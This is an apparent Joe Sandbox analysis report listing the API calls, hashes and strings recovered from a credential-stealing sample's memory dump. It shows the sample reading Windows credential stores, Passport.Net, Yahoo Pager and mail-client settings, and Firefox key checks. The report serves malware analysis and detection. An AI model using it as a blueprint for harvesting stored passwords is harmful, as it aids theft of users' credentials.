                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3974772901-0
                                                                                                                                                              • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                              • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                                                              • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                                                              • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                                                              APIs
                                                                                                                                                              • wcslen.MSVCRT ref: 0044406C
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                                                              • strlen.MSVCRT ref: 004440D1
                                                                                                                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 577244452-0
                                                                                                                                                              • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                                                              • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                              • _strcmpi.MSVCRT ref: 00404518
                                                                                                                                                              • _strcmpi.MSVCRT ref: 00404536
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _strcmpi$memcpystrlen
                                                                                                                                                              • String ID: imap$pop3$smtp
                                                                                                                                                              • API String ID: 2025310588-821077329
                                                                                                                                                              • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                                                              • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040C02D
                                                                                                                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,74DF0A60), ref: 00408EBE
                                                                                                                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408E31
                                                                                                                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                              • API String ID: 2726666094-3614832568
                                                                                                                                                              • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                                                              • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2014771361-0
                                                                                                                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                                                              APIs
                                                                                                                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcmp$memcpy
                                                                                                                                                              • String ID: global-salt$password-check
                                                                                                                                                              • API String ID: 231171946-3927197501
                                                                                                                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                                                              APIs
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??3@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                                              • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                                                                              • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                                                                              APIs
                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004016A3
                                                                                                                                                              • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                                                                                                                                              • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                                                                                                                                              • BeginPaint.USER32(?,?), ref: 004016D7
                                                                                                                                                              • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                                                                                                                                              • EndPaint.USER32(?,?), ref: 004016F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 19018683-0
                                                                                                                                                              • Opcode ID: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                              • Instruction ID: cf01e476fd02228c824cf2568a7310e823bc3a91870265851f050ef0b1242b16
                                                                                                                                                              • Opcode Fuzzy Hash: 41a9f68717181b3a98dd3cb882205833d46fa89c93d8a9d4005197e1a3202613
                                                                                                                                                              • Instruction Fuzzy Hash: 81012C76900218AFDF44DFE4DC849EE7B79FB45301F040569EA11AA1A4DAB0A904CB50
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0040644F
                                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 438689982-0
                                                                                                                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                                                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                                                                                                                                              • strlen.MSVCRT ref: 0040F7BE
                                                                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,00000000), ref: 0040F7CF
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                                                                                                                                              • String ID: Passport.Net\*
                                                                                                                                                              • API String ID: 2329438634-3671122194
                                                                                                                                                              • Opcode ID: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                              • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                                                                                                                                              • Opcode Fuzzy Hash: ac5e77b6697e9ee94173e4e8c28d13e758311ae62a0014aa2ab67cc322a84761
                                                                                                                                                              • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                                                                              • memset.MSVCRT ref: 0040330B
                                                                                                                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                                                                              • strchr.MSVCRT ref: 0040335A
                                                                                                                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                                                                              • strlen.MSVCRT ref: 0040339C
                                                                                                                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                                                                              • String ID: Personalities
                                                                                                                                                              • API String ID: 2103853322-4287407858
                                                                                                                                                              • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                                                                              • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00444573
                                                                                                                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseOpenQueryValuememset
                                                                                                                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                                                                              • API String ID: 1830152886-1703613266
                                                                                                                                                              • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                                                                              • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset
                                                                                                                                                              • String ID: H
                                                                                                                                                              • API String ID: 2221118986-2852464175
                                                                                                                                                              • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                              • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                                                                              • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                                                                              • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy
                                                                                                                                                              • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                                                                              • API String ID: 3510742995-3170954634
                                                                                                                                                              • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                              • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                                                                              • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                                                                              • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000007.00000002.2593878523.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000007.00000002.2593878523.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_7_2_400000_z120X20SO__UK__EKMELAMA.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$memset
                                                                                                                                                              • String ID: winWrite1$winWrite2
                                                                                                                                                              • API String ID: 438689982-3457389245
                                                                                                                                                              • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                                                                              • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                                                                              • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
